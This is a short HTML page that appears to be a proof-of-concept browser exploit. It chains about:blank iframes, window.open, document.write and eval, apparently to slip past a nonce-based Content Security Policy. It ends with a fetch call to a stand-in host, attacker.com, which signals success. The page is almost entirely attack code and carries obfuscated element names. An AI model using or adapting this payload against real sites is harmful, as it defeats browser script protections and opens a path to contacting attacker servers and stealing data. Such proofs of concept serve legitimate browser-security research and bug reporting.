<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGiPRmjGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGiPRmjGGGGG.onload=_=>GGGGGiPRmjGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGiPRmjGGG src=about:blank><\/iframe><script nonce=123>GGGiPRmjGGG.onload=_=>GGGiPRmjGGG.contentWindow.eval(\x22fetch(`https://attacker.com/report/report`)\x22);GGGiPRmjGGG.contentWindow.location.reload();<\/script>');");GGGGGiPRmjGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>